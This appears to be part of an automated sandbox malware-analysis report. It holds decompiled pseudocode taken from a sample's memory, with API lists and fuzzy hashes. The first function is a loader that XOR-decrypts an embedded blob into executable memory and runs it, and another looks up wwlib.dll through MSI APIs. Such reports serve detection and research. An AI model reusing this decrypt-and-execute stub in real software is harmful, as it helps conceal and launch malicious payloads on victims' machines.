    • Instruction Fuzzy Hash: 46E0C970C00309ABEB14DFA6C9049DFBBBEBFA4350B1441269124A62A0D7799652DF61
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 76%
    			E6D861030(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi) {
    				signed int _v8;
    				intOrPtr _v12;
    				char _v16;
    				void* _v20;
    				intOrPtr _v24;
    				void* __ebp;
    				signed int _t30;
    				void* _t32;
    				void* _t46;
    				intOrPtr _t55;
    				signed int _t56;
    				signed int _t57;
    				void* _t61;
    				void* _t68;
    				void* _t74;
    				void* _t75;
    				signed int _t78;
    				signed int _t79;
    
    				_t30 =  *0x6d877014; // 0x6a907f72
    				_v8 = _t30 ^ _t79;
    				_t55 = __ecx;
    				_t78 = __edx;
    				_v24 = __ecx;
    				_t32 = VirtualAlloc(0, 0x18bb, 0x1000, 0x40); // executed
    				_v20 = _t32;
    				_t84 = _t32;
    				if(_t32 != 0) {
    					E6D8659E0(_t32, 0x6d8bf690, 0x18bb);
    					_push(_t78);
    					_t74 = E6D8640A6(_t84);
    					E6D8659E0(_t74, _t55, _t78);
    					_t61 = _v20;
    					_t56 = 0;
    					do {
    						_t68 = 0;
    						if(_t78 > 0) {
    							do {
    								 *(_t68 + _t74) =  *(_t68 + _t74) >> 0x00000006 |  *(_t68 + _t74) << 0x00000002;
    								_t68 = _t68 + 1;
    							} while (_t68 < _t78);
    							_t61 = _v20;
    						}
    						asm("cdq");
    						 *(_t56 + _t61) =  *(_t56 + _t61) ^  *(_t56 % _t78 + _t74);
    						_t56 = _t56 + 1;
    						_t88 = _t56 - 0x18bb;
    					} while (_t56 < 0x18bb);
    					E6D8640AF(_t74);
    					_push(_t78);
    					_t75 = E6D8640A6(_t88);
    					E6D8659E0(_t75, _v24, _t78);
    					_t57 = 0;
    					do {
    						_t46 = 0;
    						if(_t78 > 0) {
    							do {
    								 *(_t46 + _t75) =  *(_t46 + _t75) >> 0x00000006 |  *(_t46 + _t75) << 0x00000002;
    								_t46 = _t46 + 1;
    							} while (_t46 < _t78);
    						}
    						asm("cdq");
    						 *(_t57 + 0x6d877890) =  *(_t57 + 0x6d877890) ^  *(_t57 % _t78 + _t75);
    						_t57 = _t57 + 1;
    					} while (_t57 < 0x47e00);
    					E6D8640AF(_t75);
    					_v16 = 0x6d877890;
    					_v12 = 0x47e00;
    					 *_v20( &_v16); // executed
    				}
    				return E6D864095(_v8 ^ _t79);
    			}





















    0x6d861036
    0x6d86103d
    0x6d86104e
    0x6d861050
    0x6d861054
    0x6d861057
    0x6d86105d
    0x6d861060
    0x6d861062
    0x6d861074
    0x6d861079
    0x6d861080
    0x6d861084
    0x6d861089
    0x6d86108f
    0x6d861091
    0x6d861091
    0x6d861095
    0x6d861097
    0x6d8610a4
    0x6d8610a7
    0x6d8610a8
    0x6d8610ac
    0x6d8610ac
    0x6d8610b1
    0x6d8610b7
    0x6d8610ba
    0x6d8610bb
    0x6d8610bb
    0x6d8610c4
    0x6d8610c9
    0x6d8610d3
    0x6d8610d6
    0x6d8610de
    0x6d8610e0
    0x6d8610e0
    0x6d8610e4
    0x6d8610e6
    0x6d8610f3
    0x6d8610f6
    0x6d8610f7
    0x6d8610e6
    0x6d8610fd
    0x6d861103
    0x6d861109
    0x6d86110a
    0x6d861113
    0x6d86111b
    0x6d861126
    0x6d86112d
    0x6d861132
    0x6d861142

    APIs
    • VirtualAlloc.KERNELBASE(00000000,000018BB,00001000,00000040), ref: 6D861057
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: 1db0dbeec8e0624b104da16445f1d5dcd3e78b2655de7b970c10095f58112b0f
    • Instruction ID: 004c72a064f64868acb72eafc49fd0a16cf4232a7653270ba567851be10343e5
    • Opcode Fuzzy Hash: 1db0dbeec8e0624b104da16445f1d5dcd3e78b2655de7b970c10095f58112b0f
    • Instruction Fuzzy Hash: D3316B70A092E61BD7118A7D8C99BBF7B789F49364F1009A8E55097203CB708905C7B1
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    C-Code - Quality: 86%
    			E2FF11B2C(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
    				intOrPtr _v0;
    				void* _v804;
    				intOrPtr _v808;
    				intOrPtr _v812;
    				intOrPtr _t12;
    				intOrPtr* _t29;
    				void* _t32;
    
    				_t32 = __ecx -  *0x2ff11b94; // 0x1d2dc1
    				if(_t32 != 0) {
    					 *0x2ff13198 = __eax;
    					 *0x2ff13194 = __ecx;
    					 *0x2ff13190 = __edx;
    					 *0x2ff1318c = __ebx;
    					 *0x2ff13188 = __esi;
    					 *0x2ff13184 = __edi;
    					 *0x2ff131b0 = ss;
    					 *0x2ff131a4 = cs;
    					 *0x2ff13180 = ds;
    					 *0x2ff1317c = es;
    					 *0x2ff13178 = fs;
    					 *0x2ff13174 = gs;
    					asm("pushfd");
    					_pop( *0x2ff131a8);
    					 *0x2ff1319c =  *_t29;
    					 *0x2ff131a0 = _v0;
    					 *0x2ff131ac =  &_a4;
    					 *0x2ff130e8 = 0x10001;
    					 *0x2ff1309c =  *0x2ff131a0;
    					 *0x2ff13090 = 0xc0000409;
    					 *0x2ff13094 = 1;
    					_t12 =  *0x2ff11b94; // 0x1d2dc1
    					_v812 = _t12;
    					_v808 =  *0x2ff13004;
    					 *0x2ff130e0 = IsDebuggerPresent();
    					_push(1);
    					L2FF12592();
    					SetUnhandledExceptionFilter(0);
    					UnhandledExceptionFilter(0x2ff123b0);
    					if( *0x2ff130e0 == 0) {
    						_push(1);
    						L2FF12592();
    					}
    					return TerminateProcess(GetCurrentProcess(), 0xc0000409);
    				} else {
    					return __eax;
    				}
    			}










    0x2ff11b2c
    0x2ff11b32
    0x2ff122b8
    0x2ff122bd
    0x2ff122c3
    0x2ff122c9
    0x2ff122cf
    0x2ff122d5
    0x2ff122db
    0x2ff122e1
    0x2ff122e7
    0x2ff122ed
    0x2ff122f3
    0x2ff122f9
    0x2ff122ff
    0x2ff12300
    0x2ff12309
    0x2ff12311
    0x2ff12319
    0x2ff12324
    0x2ff12333
    0x2ff12338
    0x2ff12342
    0x2ff1234c
    0x2ff12351
    0x2ff1235c
    0x2ff12368
    0x2ff1236d
    0x2ff1236f
    0x2ff12377
    0x2ff12382
    0x2ff1238f
    0x2ff12391
    0x2ff12393
    0x2ff12398
    0x2ff123ac
    0x2ff11b38
    0x2ff11b38
    0x2ff11b38

    APIs
    • IsDebuggerPresent.KERNEL32 ref: 2FF12362
    • _crt_debugger_hook.MSVCR90(00000001), ref: 2FF1236F
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 2FF12377
    • UnhandledExceptionFilter.KERNEL32(2FF123B0), ref: 2FF12382
    • _crt_debugger_hook.MSVCR90(00000001), ref: 2FF12393
    • GetCurrentProcess.KERNEL32(C0000409), ref: 2FF1239E
    • TerminateProcess.KERNEL32(00000000), ref: 2FF123A5
    Memory Dump Source
    • Source File: 00000002.00000002.462834723.000000002FF11000.00000020.00020000.sdmp, Offset: 2FF10000, based on PE: true
    • Associated: 00000002.00000002.462824849.000000002FF10000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.462857250.000000002FF14000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463124095.000000002FF90000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463277628.000000002FFCD000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463417896.000000003003D000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentDebuggerPresentTerminate
    • String ID:
    • API String ID: 3369434319-0
    • Opcode ID: f22198ad4c3d728b376c15dc1a72431a1c35d8ab01c827efde54e459a6dd779f
    • Instruction ID: 7999284e4742ebd0e323095b86affa806e3b2ed5e67d9f81edbee1b0e7431d2c
    • Opcode Fuzzy Hash: f22198ad4c3d728b376c15dc1a72431a1c35d8ab01c827efde54e459a6dd779f
    • Instruction Fuzzy Hash: 5621B0B4D10244EFFB00DF67C1596467BF4BB08369F42405AE709A7365E77C95A08F25
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetVersionExA.KERNEL32(0000009C), ref: 03031454
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: Version
    • String ID: RtlGetVersion$ntdll.dll
    • API String ID: 1889659487-1489217083
    • Opcode ID: 8a7a62dbc5b5569352d0e9418ebf9abc0b7d311e1e9d7cb11cd09f959c035911
    • Instruction ID: 7992a64888d7612eb2d4dfadc0f5d9d10c3cc8582c64b977298c5b30fa0b4ab6
    • Opcode Fuzzy Hash: 8a7a62dbc5b5569352d0e9418ebf9abc0b7d311e1e9d7cb11cd09f959c035911
    • Instruction Fuzzy Hash: 6E41D174F4A318EFDBA8EBB49CC4BADB6BCAF0B204F0804A9D507D5241C3749688CB11
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 030628A5
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03062919
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
    • String ID:
    • API String ID: 885266447-0
    • Opcode ID: df1d1e7b44ee605e1097fad69db6cab8c06083cbae53326b185f1a95aee6605d
    • Instruction ID: 2e8607f6398ffca43ce4a6662317712d7d01704f03f3e8123e93b721d72fca6e
    • Opcode Fuzzy Hash: df1d1e7b44ee605e1097fad69db6cab8c06083cbae53326b185f1a95aee6605d
    • Instruction Fuzzy Hash: 1021D275E01219AFEF01EBE4CD89AEEBBB9FB48300F108855F640A2250C7B5A9408F60
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 47%
    			E2FF12024(short __edx, void* __edi, void* __esi, intOrPtr _a4) {
    				signed int _v8;
    				char _v88;
    				short _v612;
    				char _v1132;
    				struct HINSTANCE__* _v1136;
    				char _v1140;
    				_Unknown_base(*)()* _v1144;
    				_Unknown_base(*)()* _v1148;
    				intOrPtr _v1152;
    				void* __ebx;
    				void* __ebp;
    				signed int _t37;
    				int _t42;
    				void* _t43;
    				struct HINSTANCE__* _t46;
    				_Unknown_base(*)()* _t48;
    				short _t55;
    				void* _t58;
    				struct HINSTANCE__* _t64;
    				short _t65;
    				short* _t66;
    				short _t70;
    				void* _t71;
    				CHAR* _t72;
    				void* _t73;
    				CHAR* _t74;
    				CHAR* _t76;
    				signed int _t77;
    
    				_t73 = __esi;
    				_t71 = __edi;
    				_t70 = __edx;
    				_t37 =  *0x2ff11b94; // 0x1d2dc1
    				_v8 = _t37 ^ _t77;
    				_v1152 = _a4;
    				_v1132 = 0;
    				_t42 = GetSystemDirectoryW( &_v612, 0x105);
    				_t65 = 0;
    				if(_t42 != 0) {
    					_t43 = _t42 + _t42;
    					_t66 = _t77 + _t43 - 0x260;
    					__eflags =  *_t66 - 0x5c;
    					if(__eflags != 0) {
    						_t70 = 0x5c;
    						 *_t66 = _t70;
    						__eflags = 0;
    						 *((short*)(_t77 + _t43 - 0x25e)) = 0;
    					}
    					_t74 = L"msi.dll";
    					__imp__wcsncat_s( &_v612, 0x106, _t74, 0xffffffff, _t73);
    					_push(8);
    					_push(_t65);
    					_push( &_v612);
    					_t46 = E2FF11F78(_t65, _t71, _t74, __eflags);
    					_v1136 = _t46;
    					__eflags = _t46 - _t65;
    					if(__eflags != 0) {
    						L6:
    						_v1144 = GetProcAddress(_v1136, "MsiGetProductCodeW");
    						_t48 = GetProcAddress(_v1136, "MsiProvideQualifiedComponentExW");
    						_v1148 = _t48;
    						__eflags = _t48 - _t65;
    						if(_t48 != _t65) {
    							_push(_t71);
    							_t72 = L"wwlib.dll";
    							_t76 = L"{1E77DE88-BCAB-4C37-B9E5-073AF52DFD7A}";
    							__eflags = _v1152 - _t65;
    							if(_v1152 == _t65) {
    								L18:
    								_v1140 = 0x104;
    								__eflags = _v1148(_t76, _t72, _t65, _t65, _t65, _t65,  &_v1132,  &_v1140);
    								if(__eflags == 0) {
    									goto L20;
    								}
    								goto L19;
    							} else {
    								__eflags = _v1144 - _t65;
    								if(_v1144 != _t65) {
    									_t58 = _v1144(_v1152,  &_v88);
    									__eflags = _t58 - _t65;
    									if(_t58 != _t65) {
    										L17:
    										__eflags = _t58 - 0x642;
    										if(__eflags == 0) {
    											goto L20;
    										} else {
    											goto L18;
    										}
    									} else {
    										_v1140 = 0x104;
    										_t58 = _v1148(_t76, _t72, _t65,  &_v88, _t65, _t65,  &_v1132,  &_v1140);
    										__eflags = _t58 - _t65;
    										if(__eflags == 0) {
    											L20:
    											_push( &_v1132);
    											_t65 = E2FF11656(_t65, _t72, _t76, __eflags);
    										} else {
    											goto L17;
    										}
    									}
    									L19:
    									FreeLibrary(_v1136);
    									_t55 = _t65;
    								} else {
    									FreeLibrary(_v1136);
    									_t55 = 0;
    									__eflags = 0;
    								}
    							}
    							_pop(_t71);
    						} else {
    							FreeLibrary(_v1136);
    							goto L8;
    						}
    					} else {
    						_push(_t74);
    						_t64 = E2FF11656(_t65, _t71, _t74, __eflags);
    						_v1136 = _t64;
    						__eflags = _t64 - _t65;
    						if(_t64 == _t65) {
    							L8:
    							_t55 = 0;
    						} else {
    							goto L6;
    						}
    					}
    					_pop(_t73);
    				} else {
    					_t55 = 0;
    				}
    				return E2FF11B2C(_t55, _t65, _v8 ^ _t77, _t70, _t71, _t73);
    			}































    0x2ff12024
    0x2ff12024
    0x2ff12024
    0x2ff1202d
    0x2ff12034
    0x2ff1203a
    0x2ff12043
    0x2ff12056
    0x2ff1205c
    0x2ff12060
    0x2ff12069
    0x2ff1206b
    0x2ff12072
    0x2ff12076
    0x2ff1207a
    0x2ff1207b
    0x2ff1207e
    0x2ff12080
    0x2ff12080
    0x2ff1208b
    0x2ff1209d
    0x2ff120a6
    0x2ff120a8
    0x2ff120af
    0x2ff120b0
    0x2ff120b5
    0x2ff120bb
    0x2ff120bd
    0x2ff120cf
    0x2ff120ed
    0x2ff120f3
    0x2ff120f5
    0x2ff120fb
    0x2ff120fd
    0x2ff1210f
    0x2ff12110
    0x2ff12115
    0x2ff1211a
    0x2ff12120
    0x2ff1218f
    0x2ff121a3
    0x2ff121b3
    0x2ff121b5
    0x00000000
    0x00000000
    0x00000000
    0x2ff12122
    0x2ff12122
    0x2ff12128
    0x2ff12153
    0x2ff12159
    0x2ff1215b
    0x2ff12188
    0x2ff12188
    0x2ff1218d
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x2ff1215d
    0x2ff12174
    0x2ff1217e
    0x2ff12184
    0x2ff12186
    0x2ff121ca
    0x2ff121d0
    0x2ff121d6
    0x00000000
    0x00000000
    0x00000000
    0x2ff12186
    0x2ff121b7
    0x2ff121bd
    0x2ff121c3
    0x2ff1212a
    0x2ff12130
    0x2ff12136
    0x2ff12136
    0x2ff12136
    0x2ff12128
    0x2ff12138
    0x2ff120ff
    0x2ff12105
    0x00000000
    0x2ff12105
    0x2ff120bf
    0x2ff120bf
    0x2ff120c0
    0x2ff120c5
    0x2ff120cb
    0x2ff120cd
    0x2ff1210b
    0x2ff1210b
    0x00000000
    0x00000000
    0x00000000
    0x2ff120cd
    0x2ff12139
    0x2ff12062
    0x2ff12062
    0x2ff12062
    0x2ff12146

    APIs
    • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 2FF12056
    • wcsncat_s.MSVCR90 ref: 2FF1209D
    • GetProcAddress.KERNEL32(?,MsiGetProductCodeW), ref: 2FF120E0
    • GetProcAddress.KERNEL32(?,MsiProvideQualifiedComponentExW), ref: 2FF120F3
    • FreeLibrary.KERNEL32(?), ref: 2FF12105
    • FreeLibrary.KERNEL32(?,?), ref: 2FF121BD
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.462834723.000000002FF11000.00000020.00020000.sdmp, Offset: 2FF10000, based on PE: true
    • Associated: 00000002.00000002.462824849.000000002FF10000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.462857250.000000002FF14000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463124095.000000002FF90000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463277628.000000002FFCD000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463417896.000000003003D000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AddressFreeLibraryProc$DirectorySystemwcsncat_s
    • String ID: MsiGetProductCodeW$MsiProvideQualifiedComponentExW$msi.dll$wwlib.dll${1E77DE88-BCAB-4C37-B9E5-073AF52DFD7A}
    • API String ID: 179701683-1935280381
    • Opcode ID: 0c4fbfe69d451eccb03cae09a9acd10323ae056355e994c13bd9ff7cf582bcd8
    • Instruction ID: ea5d83d0b5e028df5fb29331bb68acede04df43b116cb17a3e418bed04694aa6
    • Opcode Fuzzy Hash: 0c4fbfe69d451eccb03cae09a9acd10323ae056355e994c13bd9ff7cf582bcd8
    • Instruction Fuzzy Hash: E7414EB1904118ABEB10DFB58CC4AEB77BEAF09344F1005AAE749E6150E7715E84CF25
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • _free.LIBCMT ref: 0306BA45
    • ___free_lconv_mon.LIBCMT ref: 0306BA50
      • Part of subcall function 0306D89F: _free.LIBCMT ref: 0306D8BC
      • Part of subcall function 0306D89F: _free.LIBCMT ref: 0306D8CE
      • Part of subcall function 0306D89F: _free.LIBCMT ref: 0306D8E0
      • Part of subcall function 0306D89F: _free.LIBCMT ref: 0306D8F2
      • Part of subcall function 0306D89F: _free.LIBCMT ref: 0306D904
      • Part of subcall function 0306D89F: _free.LIBCMT ref: 0306D916
      • Part of subcall function 0306D89F: _free.LIBCMT ref: 0306D928
      • Part of subcall function 0306D89F: _free.LIBCMT ref: 0306D93A
      • Part of subcall function 0306D89F: _free.LIBCMT ref: 0306D94C
      • Part of subcall function 0306D89F: _free.LIBCMT ref: 0306D95E
      • Part of subcall function 0306D89F: _free.LIBCMT ref: 0306D970
      • Part of subcall function 0306D89F: _free.LIBCMT ref: 0306D982
      • Part of subcall function 0306D89F: _free.LIBCMT ref: 0306D994
    • _free.LIBCMT ref: 0306BA67
    • _free.LIBCMT ref: 0306BA7C
    • _free.LIBCMT ref: 0306BA87
    • _free.LIBCMT ref: 0306BAA9
    • _free.LIBCMT ref: 0306BABC
    • _free.LIBCMT ref: 0306BACA
    • _free.LIBCMT ref: 0306BAD5
    • _free.LIBCMT ref: 0306BB0D
    • _free.LIBCMT ref: 0306BB14
    • _free.LIBCMT ref: 0306BB31
    • _free.LIBCMT ref: 0306BB49
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: _free$___free_lconv_mon
    • String ID:
    • API String ID: 3658870901-0
    • Opcode ID: df6b1f7a2c8795fc4abc77b4cfee75946d9ac078e2db2fe9f4349ad85ee36e1d
    • Instruction ID: c3f1086b1679f945395731e8b6d6cc263d61a491abe74f23b8132e9a0966a5bf
    • Opcode Fuzzy Hash: df6b1f7a2c8795fc4abc77b4cfee75946d9ac078e2db2fe9f4349ad85ee36e1d
    • Instruction Fuzzy Hash: CA3182B1602300DFDB70EA7ADD44B96B7E8EF40260F189469E054DB198DFB1E880CB14
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • _free.LIBCMT ref: 0305505F
    • ___free_lconv_mon.LIBCMT ref: 0305506A
      • Part of subcall function 03055484: _free.LIBCMT ref: 030554A1
      • Part of subcall function 03055484: _free.LIBCMT ref: 030554B3
      • Part of subcall function 03055484: _free.LIBCMT ref: 030554C5
      • Part of subcall function 03055484: _free.LIBCMT ref: 030554D7
      • Part of subcall function 03055484: _free.LIBCMT ref: 030554E9
      • Part of subcall function 03055484: _free.LIBCMT ref: 030554FB
      • Part of subcall function 03055484: _free.LIBCMT ref: 0305550D
      • Part of subcall function 03055484: _free.LIBCMT ref: 0305551F
      • Part of subcall function 03055484: _free.LIBCMT ref: 03055531
      • Part of subcall function 03055484: _free.LIBCMT ref: 03055543
      • Part of subcall function 03055484: _free.LIBCMT ref: 03055555
      • Part of subcall function 03055484: _free.LIBCMT ref: 03055567
      • Part of subcall function 03055484: _free.LIBCMT ref: 03055579
    • _free.LIBCMT ref: 03055081
    • _free.LIBCMT ref: 03055096
    • _free.LIBCMT ref: 030550A1
    • _free.LIBCMT ref: 030550C3
    • _free.LIBCMT ref: 030550D6
    • _free.LIBCMT ref: 030550E4
    • _free.LIBCMT ref: 030550EF
    • _free.LIBCMT ref: 03055127
    • _free.LIBCMT ref: 0305512E
    • _free.LIBCMT ref: 0305514B
    • _free.LIBCMT ref: 03055163
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: _free$___free_lconv_mon
    • String ID:
    • API String ID: 3658870901-0
    • Opcode ID: 73233df6c67ca89a909bb20c79b1644921c48474c2f88c8f075b560591f12c9e
    • Instruction ID: 2776af67420e57e3fcd481f576bed659a8d1f8a9965638b250c71cd51e2aefa5
    • Opcode Fuzzy Hash: 73233df6c67ca89a909bb20c79b1644921c48474c2f88c8f075b560591f12c9e
    • Instruction Fuzzy Hash: B8313B766023059FEB65EA79EC44B9BB7E8AF82210F184459F85BDB550DA31E880CB50
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • ___free_lconv_mon.LIBCMT ref: 0303B82B
      • Part of subcall function 0303BB04: _free.LIBCMT ref: 0303BB21
      • Part of subcall function 0303BB04: _free.LIBCMT ref: 0303BB33
      • Part of subcall function 0303BB04: _free.LIBCMT ref: 0303BB45
      • Part of subcall function 0303BB04: _free.LIBCMT ref: 0303BB57
      • Part of subcall function 0303BB04: _free.LIBCMT ref: 0303BB69
      • Part of subcall function 0303BB04: _free.LIBCMT ref: 0303BB7B
      • Part of subcall function 0303BB04: _free.LIBCMT ref: 0303BB8D
      • Part of subcall function 0303BB04: _free.LIBCMT ref: 0303BB9F
      • Part of subcall function 0303BB04: _free.LIBCMT ref: 0303BBB1
      • Part of subcall function 0303BB04: _free.LIBCMT ref: 0303BBC3
      • Part of subcall function 0303BB04: _free.LIBCMT ref: 0303BBD5
      • Part of subcall function 0303BB04: _free.LIBCMT ref: 0303BBE7
      • Part of subcall function 0303BB04: _free.LIBCMT ref: 0303BBF9
    • _free.LIBCMT ref: 0303B820
      • Part of subcall function 03037F3F: HeapFree.KERNEL32(00000000,00000000,?,0303727A), ref: 03037F55
      • Part of subcall function 03037F3F: GetLastError.KERNEL32(?,?,0303727A), ref: 03037F67
    • _free.LIBCMT ref: 0303B842
    • _free.LIBCMT ref: 0303B857
    • _free.LIBCMT ref: 0303B862
    • _free.LIBCMT ref: 0303B884
    • _free.LIBCMT ref: 0303B897
    • _free.LIBCMT ref: 0303B8A5
    • _free.LIBCMT ref: 0303B8B0
    • _free.LIBCMT ref: 0303B8E8
    • _free.LIBCMT ref: 0303B8EF
    • _free.LIBCMT ref: 0303B90C
    • _free.LIBCMT ref: 0303B924
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
    • String ID:
    • API String ID: 161543041-0
    • Opcode ID: 386e5e8cb9b1e673c11d536092b87eb6c51cb45b9170557bb040f8dd3238d534
    • Instruction ID: 50ed6734ddf0f0a1adf2f83b1c68e772da0b7cb65d8a4ee3278bdbc5adf32339
    • Opcode Fuzzy Hash: 386e5e8cb9b1e673c11d536092b87eb6c51cb45b9170557bb040f8dd3238d534
    • Instruction Fuzzy Hash: 9C315E79A06305DFEB61EB79D844BA6B3EDFF42614F18446AE059DB290DF30E940CB50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6D86AA35(intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _t25;
    				intOrPtr* _t26;
    				intOrPtr _t28;
    				intOrPtr* _t29;
    				intOrPtr* _t31;
    				intOrPtr* _t45;
    				intOrPtr* _t46;
    				intOrPtr* _t47;
    				intOrPtr* _t55;
    				intOrPtr* _t70;
    				intOrPtr _t74;
    
    				_t74 = _a4;
    				_t25 =  *((intOrPtr*)(_t74 + 0x88));
    				if(_t25 != 0 && _t25 != 0x6d877708) {
    					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
    					if(_t45 != 0 &&  *_t45 == 0) {
    						_t46 =  *((intOrPtr*)(_t74 + 0x84));
    						if(_t46 != 0 &&  *_t46 == 0) {
    							E6D867CC2(_t46);
    							E6D86C871( *((intOrPtr*)(_t74 + 0x88)));
    						}
    						_t47 =  *((intOrPtr*)(_t74 + 0x80));
    						if(_t47 != 0 &&  *_t47 == 0) {
    							E6D867CC2(_t47);
    							E6D86C96F( *((intOrPtr*)(_t74 + 0x88)));
    						}
    						E6D867CC2( *((intOrPtr*)(_t74 + 0x7c)));
    						E6D867CC2( *((intOrPtr*)(_t74 + 0x88)));
    					}
    				}
    				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
    				if(_t26 != 0 &&  *_t26 == 0) {
    					E6D867CC2( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
    					E6D867CC2( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
    					E6D867CC2( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
    					E6D867CC2( *((intOrPtr*)(_t74 + 0x8c)));
    				}
    				E6D86ABA6( *((intOrPtr*)(_t74 + 0x9c)));
    				_t28 = 6;
    				_t55 = _t74 + 0xa0;
    				_v8 = _t28;
    				_t70 = _t74 + 0x28;
    				do {
    					if( *((intOrPtr*)(_t70 - 8)) != 0x6d877648) {
    						_t31 =  *_t70;
    						if(_t31 != 0 &&  *_t31 == 0) {
    							E6D867CC2(_t31);
    							E6D867CC2( *_t55);
    						}
    						_t28 = _v8;
    					}
    					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
    						_t29 =  *((intOrPtr*)(_t70 - 4));
    						if(_t29 != 0 &&  *_t29 == 0) {
    							E6D867CC2(_t29);
    						}
    						_t28 = _v8;
    					}
    					_t55 = _t55 + 4;
    					_t70 = _t70 + 0x10;
    					_t28 = _t28 - 1;
    					_v8 = _t28;
    				} while (_t28 != 0);
    				return E6D867CC2(_t74);
    			}















    0x6d86aa3d
    0x6d86aa41
    0x6d86aa49
    0x6d86aa52
    0x6d86aa57
    0x6d86aa5e
    0x6d86aa66
    0x6d86aa6e
    0x6d86aa79
    0x6d86aa7f
    0x6d86aa80
    0x6d86aa88
    0x6d86aa90
    0x6d86aa9b
    0x6d86aaa1
    0x6d86aaa5
    0x6d86aab0
    0x6d86aab6
    0x6d86aa57
    0x6d86aab7
    0x6d86aabf
    0x6d86aad2
    0x6d86aae5
    0x6d86aaf3
    0x6d86aafe
    0x6d86ab03
    0x6d86ab0c
    0x6d86ab14
    0x6d86ab15
    0x6d86ab1b
    0x6d86ab1e
    0x6d86ab21
    0x6d86ab28
    0x6d86ab2a
    0x6d86ab2e
    0x6d86ab36
    0x6d86ab3d
    0x6d86ab43
    0x6d86ab44
    0x6d86ab44
    0x6d86ab4b
    0x6d86ab4d
    0x6d86ab52
    0x6d86ab5a
    0x6d86ab5f
    0x6d86ab60
    0x6d86ab60
    0x6d86ab63
    0x6d86ab66
    0x6d86ab69
    0x6d86ab6c
    0x6d86ab6c
    0x6d86ab7c

    APIs
    • ___free_lconv_mon.LIBCMT ref: 6D86AA79
      • Part of subcall function 6D86C871: _free.LIBCMT ref: 6D86C88E
      • Part of subcall function 6D86C871: _free.LIBCMT ref: 6D86C8A0
      • Part of subcall function 6D86C871: _free.LIBCMT ref: 6D86C8B2
      • Part of subcall function 6D86C871: _free.LIBCMT ref: 6D86C8C4
      • Part of subcall function 6D86C871: _free.LIBCMT ref: 6D86C8D6
      • Part of subcall function 6D86C871: _free.LIBCMT ref: 6D86C8E8
      • Part of subcall function 6D86C871: _free.LIBCMT ref: 6D86C8FA
      • Part of subcall function 6D86C871: _free.LIBCMT ref: 6D86C90C
      • Part of subcall function 6D86C871: _free.LIBCMT ref: 6D86C91E
      • Part of subcall function 6D86C871: _free.LIBCMT ref: 6D86C930
      • Part of subcall function 6D86C871: _free.LIBCMT ref: 6D86C942
      • Part of subcall function 6D86C871: _free.LIBCMT ref: 6D86C954
      • Part of subcall function 6D86C871: _free.LIBCMT ref: 6D86C966
    • _free.LIBCMT ref: 6D86AA6E
      • Part of subcall function 6D867CC2: HeapFree.KERNEL32(00000000,00000000,?,6D86CA02,?,00000000,?,00000000,?,6D86CA29,?,00000007,?,?,6D86ABCC,?), ref: 6D867CD8
